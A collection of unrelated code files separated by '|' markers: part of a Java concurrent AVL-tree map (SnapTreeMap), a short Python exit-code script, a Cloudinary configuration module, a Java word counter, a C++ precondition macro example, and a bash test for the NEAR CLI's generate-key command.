return rebalanceToLeft_nl(n, nL, nLR, hLL0);
}
}
}
}
private Node<K,V> rebalanceToLeft_nl(final Node<K,V> nParent,
final Node<K,V> n,
final Node<K,V> nR,
final int hL0) {
synchronized (nR) {
final int hR = nR.height;
if (hL0 - hR >= -1) {
return n; // retry
} else {
final Node<K,V> nRL = nR.unsharedLeft();
final int hRL0 = height(nRL);
final int hRR0 = height(nR.right);
if (hRR0 >= hRL0) {
return rotateLeft_nl(nParent, n, hL0, nR, nRL, hRL0, hRR0);
} else {
synchronized (nRL) {
final int hRL = nRL.height;
if (hRR0 >= hRL) {
return rotateLeft_nl(nParent, n, hL0, nR, nRL, hRL, hRR0);
} else {
final int hRLR = height(nRL.right);
final int b = hRR0 - hRLR;
if (b >= -1 && b <= 1 && !((hRR0 == 0 || hRLR == 0) && nR.vOpt == null)) {
return rotateLeftOverRight_nl(nParent, n, hL0, nR, nRL, hRR0, hRLR);
}
}
}
return rebalanceToRight_nl(n, nR, nRL, hRR0);
}
}
}
}
private Node<K,V> rotateRight_nl(final Node<K,V> nParent,
final Node<K,V> n,
final Node<K,V> nL,
final int hR,
final int hLL,
final Node<K,V> nLR,
final int hLR) {
final long nodeOVL = n.shrinkOVL;
final Node<K,V> nPL = nParent.left;
n.shrinkOVL = beginChange(nodeOVL);
n.left = nLR;
if (nLR != null) {
nLR.parent = n;
}
nL.right = n;
n.parent = nL;
if (nPL == n) {
nParent.left = nL;
} else {
nParent.right = nL;
}
nL.parent = nParent;
// fix up heights links
final int hNRepl = 1 + Math.max(hLR, hR);
n.height = hNRepl;
nL.height = 1 + Math.max(hLL, hNRepl);
n.shrinkOVL = endChange(nodeOVL);
// We have damaged nParent, n (now parent.child.right), and nL (now
// parent.child). n is the deepest. Perform as many fixes as we can
// with the locks we've got.
// We've already fixed the height for n, but it might still be outside
// our allowable balance range. In that case a simple fixHeight_nl
// won't help.
final int balN = hLR - hR;
if (balN < -1 || balN > 1) {
// we need another rotation at n
return n;
}
// we've fixed balance and height damage for n, now handle
// extra-routing node damage
if ((nLR == null || hR == 0) && n.vOpt == null) {
// we need to remove n and then repair
return n;
}
// we've already fixed the height at nL, do we need a rotation here?
final int balL = hLL - hNRepl;
if (balL < -1 || balL > 1) {
return nL;
}
// nL might also have routing node damage (if nL.left was null)
if (hLL == 0 && nL.vOpt == null) {
return nL;
}
// try to fix the parent height while we've still got the lock
return fixHeight_nl(nParent);
}
private Node<K,V> rotateLeft_nl(final Node<K,V> nParent,
final Node<K,V> n,
final int hL,
final Node<K,V> nR,
final Node<K,V> nRL,
final int hRL,
final int hRR) {
final long nodeOVL = n.shrinkOVL;
final Node<K,V> nPL = nParent.left;
n.shrinkOVL = beginChange(nodeOVL);
// fix up n links, careful to be compatible with concurrent traversal for all but n
n.right = nRL;
if (nRL != null) {
nRL.parent = n;
}
nR.left = n;
n.parent = nR;
if (nPL == n) {
nParent.left = nR;
} else {
nParent.right = nR;
}
nR.parent = nParent;
// fix up heights
final int hNRepl = 1 + Math.max(hL, hRL);
n.height = hNRepl;
nR.height = 1 + Math.max(hNRepl, hRR);
n.shrinkOVL = endChange(nodeOVL);
final int balN = hRL - hL;
if (balN < -1 || balN > 1) {
return n;
}
if ((nRL == null || hL == 0) && n.vOpt == null) {
return n;
}
final int balR = hRR - hNRepl;
if (balR < -1 || balR > 1) {
return nR;
}
if (hRR == 0 && nR.vOpt == null) {
return nR;
}
return fixHeight_nl(nParent);
}
private Node<K,V> rotateRightOverLeft_nl(final Node<K,V> nParent,
final Node<K,V> n,
final Node<K,V> nL,
final int hR,
final int hLL,
final Node<K,V> nLR,
final int hLRL) {
final long nodeOVL = n.shrinkOVL;
final long leftOVL = nL.shrinkOVL;
final Node<K,V> nPL = nParent.left;
final Node<K,V> nLRL = nLR.unsharedLeft();
final Node<K,V> nLRR = nLR.unsharedRight();
final int hLRR = height(nLRR);
n.shrinkOVL = beginChange(nodeOVL);
nL.shrinkOVL = beginChange(leftOVL);
// fix up n links, careful about the order!
n.left = nLRR;
if (nLRR != null) {
nLRR.parent = n;
}
nL.right = nLRL;
if (nLRL != null) {
nLRL.parent = nL;
}
nLR.left = nL;
nL.parent = nLR;
nLR.right = n;
n.parent = nLR;
if (nPL == n) {
nParent.left = nLR;
} else {
nParent.right = nLR;
}
nLR.parent = nParent;
// fix up heights
final int hNRepl = 1 + Math.max(hLRR, hR);
n.height = hNRepl;
final int hLRepl = 1 + Math.max(hLL, hLRL);
nL.height = hLRepl;
nLR.height = 1 + Math.max(hLRepl, hNRepl);
n.shrinkOVL = endChange(nodeOVL);
nL.shrinkOVL = endChange(leftOVL);
// caller should have performed only a single rotation if nL was going
// to end up damaged
assert(Math.abs(hLL - hLRL) <= 1);
assert(!((hLL == 0 || nLRL == null) && nL.vOpt == null));
// We have damaged nParent, nLR (now parent.child), and n (now
// parent.child.right). n is the deepest. Perform as many fixes as we
// can with the locks we've got.
// We've already fixed the height for n, but it might still be outside
// our allowable balance range. In that case a simple fixHeight_nl
// won't help.
final int balN = hLRR - hR;
if (balN < -1 || balN > 1) {
// we need another rotation at n
return n;
}
// n might also be damaged by being an unnecessary routing node
if ((nLRR == null || hR == 0) && n.vOpt == null) {
// repair involves splicing out n and maybe more rotations
return n;
}
// we've already fixed the height at nLR, do we need a rotation here?
final int balLR = hLRepl - hNRepl;
if (balLR < -1 || balLR > 1) {
return nLR;
}
// try to fix the parent height while we've still got the lock
return fixHeight_nl(nParent);
}
private Node<K,V> rotateLeftOverRight_nl(final Node<K,V> nParent,
final Node<K,V> n,
final int hL,
final Node<K,V> nR,
final Node<K,V> nRL,
final int hRR,
final int hRLR) {
final long nodeOVL = n.shrinkOVL;
final long rightOVL = nR.shrinkOVL;
final Node<K,V> nPL = nParent.left;
final Node<K,V> nRLL = nRL.unsharedLeft();
final Node<K,V> nRLR = nRL.unsharedRight();
final int hRLL = height(nRLL);
n.shrinkOVL = beginChange(nodeOVL);
nR.shrinkOVL = beginChange(rightOVL);
// fix up n links, careful about the order!
n.right = nRLL;
if (nRLL != null) {
nRLL.parent = n;
}
nR.left = nRLR;
if (nRLR != null) {
nRLR.parent = nR;
}
nRL.right = nR;
nR.parent = nRL;
nRL.left = n;
n.parent = nRL;
if (nPL == n) {
nParent.left = nRL;
} else {
nParent.right = nRL;
}
nRL.parent = nParent;
// fix up heights
final int hNRepl = 1 + Math.max(hL, hRLL);
n.height = hNRepl;
final int hRRepl = 1 + Math.max(hRLR, hRR);
nR.height = hRRepl;
nRL.height = 1 + Math.max(hNRepl, hRRepl);
n.shrinkOVL = endChange(nodeOVL);
nR.shrinkOVL = endChange(rightOVL);
assert(Math.abs(hRR - hRLR) <= 1);
final int balN = hRLL - hL;
if (balN < -1 || balN > 1) {
return n;
}
if ((nRLL == null || hL == 0) && n.vOpt == null) {
return n;
}
final int balRL = hRRepl - hNRepl;
if (balRL < -1 || balRL > 1) {
return nRL;
}
return fixHeight_nl(nParent);
}
//////////////// Map views
@Override
public NavigableSet<K> keySet() {
return navigableKeySet();
}
@Override
public Set<Map.Entry<K,V>> entrySet() {
return new EntrySet();
}
private class EntrySet extends AbstractSet<Map.Entry<K,V>> {
@Override
public int size() {
return SnapTreeMap.this.size();
}
@Override
public boolean isEmpty() {
return SnapTreeMap.this.isEmpty();
}
@Override
public void clear() {
SnapTreeMap.this.clear();
}
@Override
public boolean contains(final Object o) {
if (!(o instanceof Map.Entry<?,?>)) {
return false;
}
final Object k = ((Map.Entry<?,?>)o).getKey();
final Object v = ((Map.Entry<?,?>)o).getValue();
final Object actualVo = SnapTreeMap.this.getImpl(k);
if (actualVo == null) {
// no associated value
return false;
}
final V actual = decodeNull(actualVo);
return v == null ? actual == null : v.equals(actual);
}
@Override
public boolean add(final Entry<K,V> e) {
final Object v = encodeNull(e.getValue());
return update(e.getKey(), UpdateAlways, null, v) != v;
}
@Override
public boolean remove(final Object o) {
if (!(o instanceof Map.Entry<?,?>)) {
return false;
}
final Object k = ((Map.Entry<?,?>)o).getKey();
final Object v = ((Map.Entry<?,?>)o).getValue();
return SnapTreeMap.this.remove(k, v);
}
@Override
public Iterator<Entry<K,V>> iterator() {
return new EntryIter<K,V>(SnapTreeMap.this);
}
}
private static class EntryIter<K,V> extends AbstractIter<K,V> implements Iterator<Map.Entry<K,V>> {
private EntryIter(final SnapTreeMap<K,V> m) {
super(m);
}
private EntryIter(final SnapTreeMap<K,V> m,
final Comparable<? super K> minCmp,
final boolean minIncl,
final Comparable<? super K> maxCmp,
final boolean maxIncl,
final boolean descending) {
super(m, minCmp, minIncl, maxCmp, maxIncl, descending);
}
@Override
public Entry<K,V> next() {
return nextNode();
}
}
private static class KeyIter<K,V> extends AbstractIter<K,V> implements Iterator<K> {
private KeyIter(final SnapTreeMap<K,V> m) {
super(m);
}
private KeyIter(final SnapTreeMap<K,V> m,
final Comparable<? super K> minCmp,
final boolean minIncl,
final Comparable<? super K> maxCmp,
final boolean maxIncl,
final boolean descending) {
super(m, minCmp, minIncl, maxCmp, maxIncl, descending);
}
@Override
public K next() {
return nextNode().key;
}
}
private static class AbstractIter<K,V> {
private final SnapTreeMap<K,V> m;
private final boolean descending;
private final char forward;
private final char reverse;
private Node<K,V>[] path;
private int depth = 0;
private Node<K,V> mostRecentNode;
private final K endKey;
@SuppressWarnings("unchecked")
AbstractIter(final SnapTreeMap<K,V> m) {
this.m = m;
this.descending = false;
this.forward = Right;
this.reverse = Left;
final Node<K,V> root = m.holderRef.frozen().right;
this.path = (Node<K,V>[]) new Node[3 + height(root)];
this.endKey = null;
pushFirst(root);
}
@SuppressWarnings("unchecked")
AbstractIter(final SnapTreeMap<K,V> m,
final Comparable<? super K> minCmp,
final boolean minIncl,
final Comparable<? super K> maxCmp,
final boolean maxIncl,
final boolean descending) {
this.m = m;
this.descending = descending;
this.forward = !descending ? Right : Left;
this.reverse = !descending ? Left : Right;
final Comparable<? super K> fromCmp;
final boolean fromIncl = !descending ? minIncl : maxIncl;
final Comparable<? super K> toCmp;
final boolean toIncl = !descending ? maxIncl : minIncl;
if (!descending) {
fromCmp = minCmp;
toCmp = maxCmp;
} else {
fromCmp = maxCmp;
toCmp = minCmp;
}
final Node<K,V> root = m.holderRef.frozen().right;
if (toCmp != null) {
this.endKey = (K) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, true, forward);
if (this.endKey == null) {
// no node satisfies the bound, nothing to iterate
// ---------> EARLY EXIT
return;
}
} else {
this.endKey = null;
}
this.path = (Node<K,V>[]) new Node[3 + height(root)];
if (fromCmp == null) {
pushFirst(root);
}
else {
pushFirst(root, fromCmp, fromIncl);
if (depth > 0 && top().vOpt == null) {
advance();
}
}
}
private int cmp(final Comparable<? super K> comparable, final K key) {
final int c = comparable.compareTo(key);
if (!descending) {
return c;
} else {
return c == Integer.MIN_VALUE ? 1 : -c;
}
}
private void pushFirst(Node<K,V> node) {
while (node != null) {
path[depth++] = node;
node = node.child(reverse);
}
}
private void pushFirst(Node<K,V> node, final Comparable<? super K> fromCmp, final boolean fromIncl) {
while (node != null) {
final int c = cmp(fromCmp, node.key);
if (c > 0 || (c == 0 && !fromIncl)) {
// everything we're interested in is on the right
node = node.child(forward);
}
else {
path[depth++] = node;
if (c == 0) {
// start the iteration here
return;
}
else {
node = node.child(reverse);
}
}
}
}
private Node<K,V> top() {
return path[depth - 1];
}
private void advance() {
do {
final Node<K,V> t = top();
if (endKey != null && endKey == t.key) {
depth = 0;
path = null;
return;
}
final Node<K,V> fwd = t.child(forward);
if (fwd != null) {
pushFirst(fwd);
} else {
// keep going up until we pop a node that is a left child
Node<K,V> popped;
do {
popped = path[--depth];
} while (depth > 0 && popped == top().child(forward));
}
if (depth == 0) {
// clear out the path so we don't pin too much stuff
path = null;
return;
}
// skip removed-but-not-unlinked entries
} while (top().vOpt == null);
}
public boolean hasNext() {
return depth > 0;
}
Node<K,V> nextNode() {
if (depth == 0) {
throw new NoSuchElementException();
}
mostRecentNode = top();
advance();
return mostRecentNode;
}
public void remove() {
if (mostRecentNode == null) {
throw new IllegalStateException();
}
m.remove(mostRecentNode.key);
mostRecentNode = null;
}
}
//////////////// navigable keySet
@Override
public NavigableSet<K> navigableKeySet() {
return new KeySet<K>(this) {
public Iterator<K> iterator() {
return new KeyIter<K,V>(SnapTreeMap.this);
}
};
}
@Override
public NavigableSet<K> descendingKeySet() {
return descendingMap().navigableKeySet();
}
private abstract static class KeySet<K> extends AbstractSet<K> implements NavigableSet<K> {
private final ConcurrentNavigableMap<K,?> map;
protected KeySet(final ConcurrentNavigableMap<K,?> map) {
this.map = map;
}
//////// basic Set stuff
@Override
abstract public Iterator<K> iterator();
@Override
public boolean contains(final Object o) { return map.containsKey(o); }
@Override
public boolean isEmpty() { return map.isEmpty(); }
@Override
public int size() { return map.size(); }
@Override
public boolean remove(final Object o) { return map.remove(o) != null; }
//////// SortedSet stuff
@Override
public Comparator<? super K> comparator() { return map.comparator(); }
@Override
public K first() { return map.firstKey(); }
@Override
public K last() { return map.lastKey(); }
//////// NavigableSet stuff
@Override
public K lower(final K k) { return map.lowerKey(k); }
@Override
public K floor(final K k) { return map.floorKey(k); }
@Override
public K ceiling(final K k) { return map.ceilingKey(k); }
@Override
public K higher(final K k) { return map.higherKey(k); }
@Override
public K pollFirst() { return map.pollFirstEntry().getKey(); }
@Override
public K pollLast() { return map.pollLastEntry().getKey(); }
@Override
public NavigableSet<K> descendingSet() { return map.descendingKeySet(); }
@Override
public Iterator<K> descendingIterator() { return map.descendingKeySet().iterator(); }
@Override
public NavigableSet<K> subSet(final K fromElement, final boolean minInclusive, final K toElement, final boolean maxInclusive) {
return map.subMap(fromElement, minInclusive, toElement, maxInclusive).keySet();
}
@Override
public NavigableSet<K> headSet(final K toElement, final boolean inclusive) {
return map.headMap(toElement, inclusive).keySet();
}
@Override
public NavigableSet<K> tailSet(final K fromElement, final boolean inclusive) {
return map.tailMap(fromElement, inclusive).keySet();
}
@Override
public SortedSet<K> subSet(final K fromElement, final K toElement) {
return map.subMap(fromElement, toElement).keySet();
}
@Override
public SortedSet<K> headSet(final K toElement) {
return map.headMap(toElement).keySet();
}
@Override
public SortedSet<K> tailSet(final K fromElement) {
return map.tailMap(fromElement).keySet();
}
}
//////////////// NavigableMap views
@Override
public ConcurrentNavigableMap<K,V> subMap(final K fromKey,
final boolean fromInclusive,
final K toKey,
final boolean toInclusive) {
final Comparable<? super K> fromCmp = comparable(fromKey);
if (fromCmp.compareTo(toKey) > 0) {
throw new IllegalArgumentException();
}
return new SubMap<K,V>(this, fromKey, fromCmp, fromInclusive, toKey, comparable(toKey), toInclusive, false);
}
@Override
public ConcurrentNavigableMap<K,V> headMap(final K toKey, final boolean inclusive) {
return new SubMap<K,V>(this, null, null, false, toKey, comparable(toKey), inclusive, false);
}
@Override
public ConcurrentNavigableMap<K,V> tailMap(final K fromKey, final boolean inclusive) {
return new SubMap<K,V>(this, fromKey, comparable(fromKey), inclusive, null, null, false, false);
}
@Override
public ConcurrentNavigableMap<K,V> subMap(final K fromKey, final K toKey) {
return subMap(fromKey, true, toKey, false);
}
@Override
public ConcurrentNavigableMap<K,V> headMap(final K toKey) {
return headMap(toKey, false);
}
@Override
public ConcurrentNavigableMap<K,V> tailMap(final K fromKey) {
return tailMap(fromKey, true);
}
@Override
public ConcurrentNavigableMap<K,V> descendingMap() {
return new SubMap(this, null, null, false, null, null, false, true);
}
private static class SubMap<K,V> extends AbstractMap<K,V> implements ConcurrentNavigableMap<K,V>, Serializable {
private static final long serialVersionUID = -7388140285999372919L;
private final SnapTreeMap<K,V> m;
private final K minKey;
private transient Comparable<? super K> minCmp;
private final boolean minIncl;
private final K maxKey;
private transient Comparable<? super K> maxCmp;
private final boolean maxIncl;
private final boolean descending;
private SubMap(final SnapTreeMap<K,V> m,
final K minKey,
final Comparable<? super K> minCmp,
final boolean minIncl,
final K maxKey,
final Comparable<? super K> maxCmp,
final boolean maxIncl,
final boolean descending) {
this.m = m;
this.minKey = minKey;
this.minCmp = minCmp;
this.minIncl = minIncl;
this.maxKey = maxKey;
this.maxCmp = maxCmp;
this.maxIncl = maxIncl;
this.descending = descending;
}
// TODO: clone
private boolean tooLow(final K key) {
if (minCmp == null) {
return false;
} else {
final int c = minCmp.compareTo(key);
return c > 0 || (c == 0 && !minIncl);
}
}
private boolean tooHigh(final K key) {
if (maxCmp == null) {
return false;
} else {
final int c = maxCmp.compareTo(key);
return c < 0 || (c == 0 && !maxIncl);
}
}
private boolean inRange(final K key) {
return !tooLow(key) && !tooHigh(key);
}
private void requireInRange(final K key) {
if (key == null) {
throw new NullPointerException();
}
if (!inRange(key)) {
throw new IllegalArgumentException();
}
}
private char minDir() {
return descending ? Right : Left;
}
private char maxDir() {
return descending ? Left : Right;
}
//////// AbstractMap
@Override
public boolean isEmpty() {
return m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, true, Left) == null;
}
@Override
public int size() {
final Node<K,V> root = m.holderRef.frozen().right;
return Node.computeFrozenSize(root, minCmp, minIncl, maxCmp, maxIncl);
}
@Override
@SuppressWarnings("unchecked")
public boolean containsKey(final Object key) {
if (key == null) {
throw new NullPointerException();
}
final K k = (K) key;
return inRange(k) && m.containsKey(k);
}
@Override
public boolean containsValue(final Object value) {
// apply the same null policy as the rest of the code, but fall
// back to the default implementation
encodeNull(value);
return super.containsValue(value);
}
@Override
@SuppressWarnings("unchecked")
public V get(final Object key) {
if (key == null) {
throw new NullPointerException();
}
final K k = (K) key;
return !inRange(k) ? null : m.get(k);
}
@Override
public V put(final K key, final V value) {
requireInRange(key);
return m.put(key, value);
}
@Override
@SuppressWarnings("unchecked")
public V remove(final Object key) {
if (key == null) {
throw new NullPointerException();
}
return !inRange((K) key) ? null : m.remove(key);
}
@Override
public Set<Entry<K,V>> entrySet() {
return new EntrySubSet();
}
private class EntrySubSet extends AbstractSet<Map.Entry<K,V>> {
public int size() {
return SubMap.this.size();
}
@Override
public boolean isEmpty() {
return SubMap.this.isEmpty();
}
@SuppressWarnings("unchecked")
@Override
public boolean contains(final Object o) {
if (!(o instanceof Map.Entry<?,?>)) {
return false;
}
final Object k = ((Map.Entry<?,?>)o).getKey();
if (!inRange((K) k)) {
return false;
}
final Object v = ((Map.Entry<?,?>)o).getValue();
final Object actualVo = m.getImpl(k);
if (actualVo == null) {
// no associated value
return false;
}
final V actual = m.decodeNull(actualVo);
return v == null ? actual == null : v.equals(actual);
}
@Override
public boolean add(final Entry<K,V> e) {
requireInRange(e.getKey());
final Object v = encodeNull(e.getValue());
return m.update(e.getKey(), UpdateAlways, null, v) != v;
}
@Override
public boolean remove(final Object o) {
if (!(o instanceof Map.Entry<?,?>)) {
return false;
}
final Object k = ((Map.Entry<?,?>)o).getKey();
final Object v = ((Map.Entry<?,?>)o).getValue();
return SubMap.this.remove(k, v);
}
@Override
public Iterator<Entry<K,V>> iterator() {
return new EntryIter<K,V>(m, minCmp, minIncl, maxCmp, maxIncl, descending);
}
}
//////// SortedMap
@Override
public Comparator<? super K> comparator() {
final Comparator<? super K> fromM = m.comparator();
if (descending) {
return Collections.reverseOrder(fromM);
} else {
return fromM;
}
}
@Override
public K firstKey() {
return m.boundedExtremeKeyOrThrow(minCmp, minIncl, maxCmp, maxIncl, minDir());
}
@Override
public K lastKey() {
return m.boundedExtremeKeyOrThrow(minCmp, minIncl, maxCmp, maxIncl, maxDir());
}
//////// NavigableMap
@SuppressWarnings("unchecked")
private K firstKeyOrNull() {
return (K) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, true, minDir());
}
@SuppressWarnings("unchecked")
private K lastKeyOrNull() {
return (K) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, true, maxDir());
}
@SuppressWarnings("unchecked")
private Entry<K,V> firstEntryOrNull() {
return (Entry<K,V>) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, false, minDir());
}
@SuppressWarnings("unchecked")
private Entry<K,V> lastEntryOrNull() {
return (Entry<K,V>) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, false, maxDir());
}
@Override
public Entry<K,V> lowerEntry(final K key) {
if (key == null) {
throw new NullPointerException();
}
if (!descending ? tooLow(key) : tooHigh(key)) {
return null;
}
return ((!descending ? tooHigh(key) : tooLow(key))
? this : subMapInRange(null, false, key, false)).lastEntryOrNull();
}
@Override
public K lowerKey(final K key) {
if (key == null) {
throw new NullPointerException();
}
if (!descending ? tooLow(key) : tooHigh(key)) {
return null;
}
return ((!descending ? tooHigh(key) : tooLow(key))
? this : subMapInRange(null, false, key, false)).lastKeyOrNull();
}
@Override
public Entry<K,V> floorEntry(final K key) {
if (key == null) {
throw new NullPointerException();
}
if (!descending ? tooLow(key) : tooHigh(key)) {
return null;
}
return ((!descending ? tooHigh(key) : tooLow(key))
? this : subMapInRange(null, false, key, true)).lastEntryOrNull();
}
@Override
public K floorKey(final K key) {
if (key == null) {
throw new NullPointerException();
}
if (!descending ? tooLow(key) : tooHigh(key)) {
return null;
}
return ((!descending ? tooHigh(key) : tooLow(key))
? this : subMapInRange(null, false, key, true)).lastKeyOrNull();
}
@Override
public Entry<K,V> ceilingEntry(final K key) {
if (key == null) {
throw new NullPointerException();
}
if (!descending ? tooHigh(key) : tooLow(key)) {
return null;
}
return ((!descending ? tooLow(key) : tooHigh(key))
? this : subMapInRange(key, true, null, false)).firstEntryOrNull();
}
@Override
public K ceilingKey(final K key) {
if (key == null) {
throw new NullPointerException();
}
if (!descending ? tooHigh(key) : tooLow(key)) {
return null;
}
return ((!descending ? tooLow(key) : tooHigh(key))
? this : subMapInRange(key, true, null, false)).firstKeyOrNull();
}
@Override
public Entry<K,V> higherEntry(final K key) {
if (key == null) {
throw new NullPointerException();
}
if (!descending ? tooHigh(key) : tooLow(key)) {
return null;
}
return ((!descending ? tooLow(key) : tooHigh(key))
? this : subMapInRange(key, false, null, false)).firstEntryOrNull();
}
@Override
public K higherKey(final K key) {
if (key == null) {
throw new NullPointerException();
}
if (!descending ? tooHigh(key) : tooLow(key)) {
return null;
}
return ((!descending ? tooLow(key) : tooHigh(key))
? this : subMapInRange(key, false, null, false)).firstKeyOrNull();
}
@Override
@SuppressWarnings("unchecked")
public Entry<K,V> firstEntry() {
return (Entry<K,V>) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, false, minDir());
}
@Override
@SuppressWarnings("unchecked")
public Entry<K,V> lastEntry() {
return (Entry<K,V>) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, false, maxDir());
}
@Override
@SuppressWarnings("unchecked")
public Entry<K,V> pollFirstEntry() {
while (true) {
final Entry<K,V> snapshot = (Entry<K,V>) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, false, minDir());
if (snapshot == null || m.remove(snapshot.getKey(), snapshot.getValue())) {
return snapshot;
}
}
}
@Override
@SuppressWarnings("unchecked")
public Entry<K,V> pollLastEntry() {
while (true) {
final Entry<K,V> snapshot = (Entry<K,V>) m.boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, false, maxDir());
if (snapshot == null || m.remove(snapshot.getKey(), snapshot.getValue())) {
return snapshot;
}
}
}
//////// ConcurrentMap
@Override
public V putIfAbsent(final K key, final V value) {
requireInRange(key);
return m.putIfAbsent(key, value);
}
@Override
@SuppressWarnings("unchecked")
public boolean remove(final Object key, final Object value) {
return inRange((K) key) && m.remove(key, value);
}
@Override
public boolean replace(final K key, final V oldValue, final V newValue) {
requireInRange(key);
return m.replace(key, oldValue, newValue);
}
@Override
public V replace(final K key, final V value) {
requireInRange(key);
return m.replace(key, value);
}
//////// ConcurrentNavigableMap
@Override
public SubMap<K,V> subMap(final K fromKey,
final boolean fromInclusive,
final K toKey,
final boolean toInclusive) {
if (fromKey == null || toKey == null) {
throw new NullPointerException();
}
return subMapImpl(fromKey, fromInclusive, toKey, toInclusive);
}
@Override
public SubMap<K,V> headMap(final K toKey, final boolean inclusive) {
if (toKey == null) {
throw new NullPointerException();
}
return subMapImpl(null, false, toKey, inclusive);
}
@Override
public SubMap<K,V> tailMap(final K fromKey, final boolean inclusive) {
if (fromKey == null) {
throw new NullPointerException();
}
return subMapImpl(fromKey, inclusive, null, false);
}
@Override
public SubMap<K,V> subMap(final K fromKey, final K toKey) {
return subMap(fromKey, true, toKey, false);
}
@Override
public SubMap<K,V> headMap(final K toKey) {
return headMap(toKey, false);
}
@Override
public SubMap<K,V> tailMap(final K fromKey) {
return tailMap(fromKey, true);
}
private SubMap<K,V> subMapImpl(final K fromKey,
final boolean fromIncl,
final K toKey,
final boolean toIncl) {
if (fromKey != null) {
requireInRange(fromKey);
}
if (toKey != null) {
requireInRange(toKey);
}
return subMapInRange(fromKey, fromIncl, toKey, toIncl);
}
private SubMap<K,V> subMapInRange(final K fromKey,
final boolean fromIncl,
final K toKey,
final boolean toIncl) {
final Comparable<? super K> fromCmp = fromKey == null ? null : m.comparable(fromKey);
final Comparable<? super K> toCmp = toKey == null ? null : m.comparable(toKey);
if (fromKey != null && toKey != null) {
final int c = fromCmp.compareTo(toKey);
if ((!descending ? c > 0 : c < 0)) {
throw new IllegalArgumentException();
}
}
K minK = minKey;
Comparable<? super K> minC = minCmp;
boolean minI = minIncl;
K maxK = maxKey;
Comparable<? super K> maxC = maxCmp;
boolean maxI = maxIncl;
if (fromKey != null) {
if (!descending) {
minK = fromKey;
minC = fromCmp;
minI = fromIncl;
} else {
maxK = fromKey;
maxC = fromCmp;
maxI = fromIncl;
}
}
if (toKey != null) {
if (!descending) {
maxK = toKey;
maxC = toCmp;
maxI = toIncl;
} else {
minK = toKey;
minC = toCmp;
minI = toIncl;
}
}
return new SubMap(m, minK, minC, minI, maxK, maxC, maxI, descending);
}
@Override
public SubMap<K,V> descendingMap() {
return new SubMap<K,V>(m, minKey, minCmp, minIncl, maxKey, maxCmp, maxIncl, !descending);
}
@Override
public NavigableSet<K> keySet() {
return navigableKeySet();
}
@Override
public NavigableSet<K> navigableKeySet() {
return new KeySet<K>(SubMap.this) {
public Iterator<K> iterator() {
return new KeyIter<K,V>(m, minCmp, minIncl, maxCmp, maxIncl, descending);
}
};
}
@Override
public NavigableSet<K> descendingKeySet() {
return descendingMap().navigableKeySet();
}
//////// Serialization
private void readObject(final ObjectInputStream xi) throws IOException, ClassNotFoundException {
xi.defaultReadObject();
minCmp = minKey == null ? null : m.comparable(minKey);
maxCmp = maxKey == null ? null : m.comparable(maxKey);
}
}
//////// Serialization
/** Saves the state of the <code>SnapTreeMap</code> to a stream. */
@SuppressWarnings("unchecked")
private void writeObject(final ObjectOutputStream xo) throws IOException {
// this handles the comparator, and any subclass stuff
xo.defaultWriteObject();
// by cloning the COWMgr, we get a frozen tree plus the size
final COWMgr<K,V> h = (COWMgr<K,V>) holderRef.clone();
xo.writeInt(h.size());
writeEntry(xo, h.frozen().right);
}
private void writeEntry(final ObjectOutputStream xo, final Node<K,V> node) throws IOException {
if (node != null) {
writeEntry(xo, node.left);
if (node.vOpt != null) {
xo.writeObject(node.key);
xo.writeObject(decodeNull(node.vOpt));
}
writeEntry(xo, node.right);
}
}
/** Reverses {@link #writeObject(ObjectOutputStream)}. */
private void readObject(final ObjectInputStream xi) throws IOException, ClassNotFoundException {
xi.defaultReadObject();
final int size = xi.readInt();
// TODO: take advantage of the sort order
// for now we optimize only by bypassing the COWMgr
final RootHolder<K,V> holder = new RootHolder<K,V>();
for (int i = 0; i < size; ++i) {
final K k = (K) xi.readObject();
final V v = (V) xi.readObject();
updateUnderRoot(k, comparable(k), UpdateAlways, null, encodeNull(v), holder);
}
holderRef = new COWMgr<K,V>(holder, size);
}
}
|
import sys
import time
for x in range(0, 2):
print ("result %d" % x)
time.sleep(1)
print ("foobar!", file=sys.stderr)
sys.exit(1)
|
import cloudinary from 'cloudinary'
const cloudinaryV2 = cloudinary.v2
cloudinaryV2.config({
cloud_name: process.env.CLOUD_NAME,
api_key: process.env.API_KEY,
api_secret: process.env.API_SECRET,
})
export default cloudinaryV2
|
public class WordCounter {
public static int countWords(String str)
{
int count = 0;
char ch[] = new char[str.length()];
for (int i = 0; i < str.length(); i++) {
ch[i] = str.charAt(i);
if (((i > 0) && (ch[i] != ' ') &&
(ch[i - 1] == ' ')) || ((ch[0] != ' ') &&
(i == 0)))
count++;
}
return count;
}
public static void main(String[] args)
{
String str = "This is an example";
System.out.println(countWords(str));
}
} |
#include <iostream>
#include <stdexcept>
#define CUSTOM_PRE_CONDITION(condition) \
do { \
if (!(condition)) { \
throw std::runtime_error("Pre-condition failed: " #condition); \
} \
} while (0)
// Usage example
void someFunction(int nbComponents, Type formatType, ComponentUsage componentUsage)
{
CUSTOM_PRE_CONDITION(nbComponents > 0);
CUSTOM_PRE_CONDITION(formatType < Type::NbTypes);
CUSTOM_PRE_CONDITION(componentUsage < ComponentUsage::NbUsages);
// Function body
std::cout << "Function executed successfully!" << std::endl;
}
int main()
{
try
{
someFunction(5, Type::TypeA, ComponentUsage::Usage1);
}
catch (const std::exception& e)
{
std::cerr << "Exception caught: " << e.what() << std::endl;
}
return 0;
} |
#!/bin/bash
set -ex
KEY_FILE=~/.near-credentials/$NODE_ENV/generate-key-test.json
rm -f "$KEY_FILE"
echo "Testing generating-key: new key"
RESULT=$(./bin/near generate-key generate-key-test --networkId $NODE_ENV -v)
echo $RESULT
if [[ ! -f "${KEY_FILE}" ]]; then
echo "FAILURE Key file doesn't exist"
exit 1
fi
EXPECTED=".*Generated key pair with ed25519:.+ public key.*"
if [[ ! "$RESULT" =~ $EXPECTED ]]; then
echo FAILURE Unexpected output from near generate-key
exit 1
fi
echo "Testing generating-key: key for account already exists"
RESULT2=$(./bin/near generate-key generate-key-test --networkId $NODE_ENV -v)
echo $RESULT2
